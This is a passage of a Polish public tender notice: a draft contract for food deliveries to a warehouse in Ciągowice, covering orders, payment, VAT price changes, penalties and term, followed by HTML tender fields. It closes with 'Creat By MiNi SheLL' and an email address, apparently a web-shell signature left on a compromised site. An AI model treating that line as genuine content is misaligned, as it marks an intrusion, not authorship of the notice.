2) asortyment,
3) ilość poszczególnego asortymentu.
3. Zamawiający uprawniony jest do złożenia Zamówienia najpóźniej do godziny 13.00 dnia poprzedzającego dzień dostawy. Zamówienie może być złożone za pomocą faksu, telefonicznie, lub pocztą elektroniczną.  
4. Wykonawca zobowiązany jest do dostarczenia asortymentu zgodnie ze złożonym przez Zamawiającego Zamówieniem, do godziny 13.00 dnia dostawy, do magazynu wskazanego przez Zamawiającego, położonego na terenie Oddziału Zewnętrznego w Ciągowiach (gm. Łazy, pow. zawierciański) przy ulicy Wojska Polskiego 10.
5. Wykonawca zobowiązany jest dostarczać asortyment zgodny ze złożonym Zamówieniem, przez co rozumie się w szczególności:
1) zgodność pod względem jakościowym tj. spełnienie wszelkich norm jakościowych, zgodność z właściwymi przepisami, zgodność z obowiązującym wymaganiami w zakresie warunków zdrowotnych żywności i żywienia oraz naniesiony opis asortymentu określony w § 2 ust. 2 niniejszej umowy, 
2) zgodność pod względem ilościowym tj. zgodność pomiędzy ilością asortymentu dostarczanego w ramach realizacji poszczególnej dostawy (poszczególnego Zamówienia), a ilością asortymentu wskazaną przez Zamawiającego w poszczególnym Zamówieniu. 
6. Przyjęcie przez Zamawiającego poszczególnej dostawy poprzedzone jest wspólną kontrolą ilościowo  jakościową przeprowadzoną przez osoby działające w imieniu Zamawiającego i Wykonawcę lub też osoby działające w imieniu lub na rzecz Wykonawcy. W przypadku zakwestionowania dostawy, która nie odpowiada Zamówieniu ilościowo lub jakościowo bądź też z innych przyczyn nie odpowiada obowiązującym wymaganiom w zakresie warunków zdrowotnych żywności i żywienia, Zamawiający sporządza protokół niezgodności zawierający wszelkie ustalenia dokonane w toku odbioru. Protokół niezgodności podpisuje osoba dokonująca odbioru w imieniu Zamawiającego i Wykonawcy lub osoba dostarczająca towar w imieniu lub na rzecz Wykonawcy. W przypadku odmowy podpisania protokołu niezgodności, Zamawiający uprawniony jest do jednostronnego sporządzenia tegoż protokołu ze skutkiem dla Wykonawcy. Wykonawca upoważnia każdą osobę dokonującą w jego imieniu bądź na jego rzecz dostawy do podpisania protokołu niezgodności.
7. Wykonawca zobowiązany jest do wymiany asortymentu niezgodnego ze złożonym Zamówieniem, bądź też uzupełnienia asortymentu w przypadku braków ilościowych - najpóźniej do godziny 8.00 dnia następującego po dniu dostawy.
8. Zamawiający uprawniony jest do badania, na koszt Wykonawcy, staraniem własnym lub przez osoby trzecie jakości dostarczonego przez Wykonawcę asortymentu.
9. Postanowienia niniejszego paragrafu nie wyłączają jakichkolwiek uprawnień Zamawiającego przysługujących mu z tytułu rękojmi. 
§ 4
ZOBOWIĄZANIA ZAMAWIAJĄCEGO
	
1. Zamawiający, z zastrzeżeniem ust. 2 i 3 poniżej, zobowiązany jest do zapłaty na rzecz Wykonawcy
za każdą, zrealizowaną zgodnie z poszczególnym Zamówieniem, dostawę asortymentu. Zapłata następuje w terminie .. dni (10) od dnia doręczenia Zamawiającemu prawidłowo wystawionej przez Wykonawcę faktury, na rachunek bankowy Wykonawcy .............................................................. Strony zgodnie ustalają, iż za dzień zapłaty uznaje się dzień obciążenia rachunku bankowego Zamawiającego.
2. Wykonawca świadomy jest faktu, iż ilość asortymentu określona w załączniku nr  do Specyfikacji Istotnych Warunków Zamówienia  Formularzu cenowym jest ilością maksymalną, jaką może zamówić Zamawiający i może ona ulec zmniejszeniu w zależności od potrzeb Zamawiającego. Tym samym, uzyskana przez Wykonawcę w wyniku wykonywania na podstawie niniejszej umowy sukcesywnych dostaw cena całkowita może być niższa od określonej w załączniku do oferty złożonej w toku postępowania przetargowego  Formularzu cenowym oraz stanowiącej podstawę wyboru oferty Wykonawcy albowiem faktycznie jest ona proporcjonalna do ilości dostarczonego przez Wykonawcę asortymentu oraz zaoferowanych przez Wykonawcę cen jednostkowych za poszczególny asortyment. W przypadku, gdyby rzeczywista suma ilości asortymentu określona przez Zamawiającego w poszczególnych Zamówieniach i dostarczonego przez Wykonawcę, a w konsekwencji również i uiszczona przez Zamawiającego cena, były mniejsze od ilości asortymentu określonej w załączniku nr  do Specyfikacji Istotnych Warunków Zamówienia  Formularzu cenowym oraz ceny całkowitej określonej przez Wykonawcę w załączniku do oferty złożonej w toku postępowania przetargowego  Formularzu cenowym, Wykonawca nie jest uprawniony do dochodzenia odszkodowania z tego tytułu względnie do dochodzenia innych praw, w tym w szczególności żądania wykonania umowy, zarówno od Zamawiającego jak i innych jednostek organizacyjnych Skarbu Państwa i zobowiązuje się w tym zakresie do powstrzymania od wszelkich działań zmierzających do dochodzenia ewentualnych roszczeń.
3. Wykonawca, wystawiając fakturę, o której mowa w ust. 1 powyżej, zobowiązany jest uwzględnić w szczególności:
1) numer lub datę poszczególnego Zamówienia,
2) dostarczony asortyment w ramach realizacji poszczególnego Zamówienia oraz ilość dostarczonego asortymentu,
3) cenę jednostkową netto dla danego asortymentu określoną zgodnie z załącznikiem do oferty złożonej przez Wykonawcę w toku postępowania przetargowego  Formularzu cenowym.
4. Zamawiający, w okresie obowiązywania niniejszej umowy, zobowiązuje się do odbioru od Wykonawcy dostaw asortymentu obejmujących 60% (sześćdziesiąt procent) ilości asortymentu wskazanego przez Zamawiającego w załączniku nr  do Specyfikacji Istotnych Warunków Zamówienia  Formularzu cenowym. 
§ 5
ZMIANY UMOWY

Strony, mając na uwadze ewentualną zmianę stawek podatku od towarów i usług, zgodnie postanawiają, iż w przypadku ich zmiany na mocy powszechnie obowiązujących przepisów prawa, zmianie może ulec cena jednostkowa brutto za poszczególny asortyment, przy zachowaniu następujących warunków:
1) w sytuacji podwyższenia stawki podatku od towarów i usług dla danego asortymentu  Wykonawca uprawniony jest do podwyższenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego  Formularzu cenowym, a stawką obowiązującą po zmianie stawki; Wykonawca nie jest uprawniony do podwyższenia ceny jednostkowej brutto za asortyment dostarczony Zamawiającemu przed dniem zmiany stawki podatku;
2) w sytuacji obniżenia stawki podatku od towarów i usług dla danego asortymentu  Wykonawca zobowiązany jest do obniżenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego  Formularzu cenowym, a stawką obowiązującą po zmianie stawki podatku.
W przypadkach określonych w pkt. 1 oraz 2 powyżej, każdorazowo niezmienna pozostaje cena netto danego asortymentu, stanowiąca podstawę do naliczenia podatku od towarów i usług.
§ 6
KARY UMOWNE
1. Wykonawca zobowiązuje się zapłacić Zamawiającemu kary umowne: 
1) w przypadku opóźnienia dostawy w stosunku do terminu dostawy określonego zgodnie z §3 ust. 4 niniejszej umowy - w wysokości 5% wartości poszczególnego Zamówienia brutto za każdą godzinę opóźnienia dostawy,
2) w przypadku opóźnienia dostawy w stosunku do terminu określonego zgodnie z §3 ust. 7 niniejszej umowy - w wysokości 10% wartości poszczególnego Zamówienia brutto co do którego zaistniał obowiązek Wykonawcy określony w §3 ust. 7 za każdą godzinę opóźnienia,
3) w przypadku uchybienia obowiązkowi określonemu w § 8 ust. 2 niniejszej umowy - w wysokości 100,00 zł za każdy dzień opóźnienia,
4) w przypadku uchybienia obowiązkowi określonemu  w § 2 ust. 4 niniejszej umowy - w wysokości 5000,00 zł,
5) w przypadku odstąpienia przez Zamawiającego od niniejszej umowy z przyczyn spowodowanych okolicznościami leżącymi po stronie Wykonawcy lub też rozwiązania przez Zamawiającego niniejszej umowy ze skutkiem natychmiastowym  z przyczyn określonych w  § 7 ust. 2 niniejszej umowy - w wysokości 10% ceny całkowitej brutto wskazanej w ofercie przez Wykonawcę
2. Strony, bez uszczerbku dla postanowień ust. 3 i 4 poniżej, przewidują następujące ograniczenie wysokości kar umownych należnych Zamawiającemu:
1) w przypadku wskazanym w ust. 1 pkt 1 powyżej  do wartości brutto poszczególnego Zamówienia,
2) w przypadku wskazanym w ust. 1 pkt 2 powyżej  do półtorakrotności wartości brutto poszczególnego Zamówienia,
3) w przypadku wskazanym w ust. 1 pkt 3 powyżej  do dwudziestokrotności zastrzeżonej w ust. 1 pkt 3 kary umownej. 
3. Kary umowne określone w  ust. 1 i 2 mogą być stosowane kumulatywnie.
4. Zamawiający uprawniony jest do dochodzenia od Wykonawcy odszkodowania za szkodę przenoszącą swą wysokością wartość zastrzeżonych kar umownych.
5. Zamawiający uprawniony jest do dokonania potrącenia należności wynikających z nałożonych na Wykonawcę kar umownych z należnościami przysługującymi Wykonawcy z tytułu dokonanych dostaw lub innych wierzytelności przysługujących Wykonawcy w stosunku do Zamawiającego lub innej jednostki organizacyjnej Skarbu Państwa.
6. W celu usunięcia wszelkich wątpliwości, w przypadku odstąpienia w całości lub części od niniejszej umowy przez którąkolwiek ze Stron, odstąpienie to nie odnosi skutku do postanowień ust. 1  5 powyżej, a zobowiązanie Zleceniobiorcy do zapłaty kar umownych orz uprawnienia Zleceniodawcy przewidziane w tych postanowieniach Strony uznają za wiążące także po złożeniu oświadczenia o odstąpieniu od umowy w całości lub w części.
§ 7
OBOWIĄZYWANIE UMOWY
1. Niniejsza umowa, z zastrzeżeniem ust. 2 poniżej, obowiązuje w okresie od dnia ................roku do dnia 10 września 2017 roku.
2. Zamawiający uprawniony jest do rozwiązania niniejszej umowy ze skutkiem natychmiastowym w następujących  przypadkach: 
1) powtarzających się reklamacji co do zgodności ze złożonym Zamówieniem. Przez powtarzające się reklamacje rozumie się co najmniej trzykrotne naruszenie obowiązków przez Wykonawcę w zakresie  terminowości co do dnia i godziny dostawy lub zgodności dostawy z Zamówieniem pod względem jakościowym lub zgodności dostawy  z Zamówieniem pod względem ilościowym, 
2) uchybiania obowiązkowi określonemu w § 8 ust. 2 niniejszej umowy przez okres co najmniej 7 dni roboczych po upływie terminu określonego w § 8 ust. 2 niniejszej umowy,
3) zgłoszenia przez Strony lub osoby trzecie wniosku o ogłoszenie upadłości Wykonawcy.
§ 8
SPOSOBY KOMUNIKACJI 
1. Na potrzeby koordynacji działań w zakresie realizacji niniejszej umowy, w tym w szczególności składania Zamówień, Strony ustalają następujące osoby kontaktowe:

1) za Wykonawcę:

Pan/Pani ............................ tel. ....................., e-mail:................................, faks: .......................
Pan/Pani ............................ tel. ....................., e-mail:................................, faks: .......................

2) za Zamawiającego: 

Pan/Pani ............................ tel. ....................., e-mail:................................, faks: .......................
Pan/Pani ............................ tel. ....................., e-mail:................................, faks: .......................

2. W przypadku braku wskazania przez Wykonawcę w chwili zawierania niniejszej umowy co najmniej personaliów jednej osoby oraz adresu poczty elektronicznej (e-mail), o których mowa w ust. 1 pkt 1 powyżej, Wykonawca zobowiązany jest do wskazania Zamawiającemu tych danych, w formie pisemnej pod rygorem nieważności, w terminie 3 dni roboczych liczonych od dnia zawarcia niniejszej umowy.  
3. Postanowienia ust. 1 nie uchybiają przepisom o reprezentacji stron.
4. Strony oświadczają, iż adresy wskazane w nagłówku niniejszej umowy stanowią adresy stron dla doręczeń. Strony zobowiązane są do poinformowania, w formie pisemnej pod rygorem nieważności, o zmianie adresu dla doręczeń lub adresu poczty elektronicznej pod rygorem przyjęcia, iż w przypadku uchybienia temu obowiązkowi doręczenia dokonywane na dotychczasowy adres uznawane są za skuteczne.
§ 9
POSTANOWIENIA KOŃCOWE
1. Wykonawca nie jest uprawniony do przelewu jakichkolwiek wierzytelności przysługujących mu w stosunku do Zamawiającego bez uprzedniej, wyrażonej w formie pisemnej pod rygorem nieważności, zgody Zamawiającego. Postanowienie zd. 1 niniejszego ustępu stosuje się także do ustanowienia zastawu na wierzytelności przysługującej Wykonawcy w stosunku do Zamawiającego, powierniczego przelewu takiej wierzytelności oraz innych czynności prawnych, których skutkiem jest lub mogłoby być dochodzenie wierzytelności przez osobę trzecią.
2. W kwestiach nieuregulowanych niniejszą umową, wiążące dla Wykonawcy są treść złożonej przezeń oferty w toku postępowania przetargowego, jak również wszelkie oświadczenia, zapewnienia i inne czynności prawne i faktyczne złożone lub dokonane przez Wykonawcę w toku tegoż postępowania, a także warunki określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia. 
3. Wszelkie zmiany niniejszej umowy wymagają dla swej skuteczności zachowania formy pisemnej pod rygorem nieważności.
4. Zastosowanie do niniejszej umowy znajdują przepisy powszechnie obowiązującego prawa polskiego, w tym w szczególności przepisy Kodeksu cywilnego oraz ustawy  Prawo zamówień publicznych.
5. Wszelkie mogące wynikać spory na tle stosowania niniejszej umowy rozstrzygać będzie sąd właściwy dla siedziby Zamawiającego.
6. Niniejszą umowę sporządzono w trzech jednobrzmiących egzemplarzach, jeden dla Wykonawcy oraz dwa dla Zamawiającego. 




      ZAMAWIAJĄCY						WYKONAWCA
</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Strony, mając na uwadze ewentualną zmianę stawek podatku od towarów i usług, zgodnie postanawiają, iż w przypadku ich zmiany na mocy powszechnie obowiązujących przepisów prawa, zmianie może ulec cena jednostkowa brutto za poszczególny asortyment, przy zachowaniu następujących warunków:
1) w sytuacji podwyższenia stawki podatku od towarów i usług dla danego asortymentu  Wykonawca uprawniony jest do podwyższenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego  Formularzu cenowym, a stawką obowiązującą po zmianie stawki; Wykonawca nie jest uprawniony do podwyższenia ceny jednostkowej brutto za asortyment dostarczony Zamawiającemu przed dniem zmiany stawki podatku;
2) w sytuacji obniżenia stawki podatku od towarów i usług dla danego asortymentu  Wykonawca zobowiązany jest do obniżenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego  Formularzu cenowym, a stawką obowiązującą po zmianie stawki podatku.
W przypadkach określonych w pkt. 1 oraz 2 powyżej, każdorazowo niezmienna pozostaje cena netto danego asortymentu, stanowiąca podstawę do naliczenia podatku od towarów i usług.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com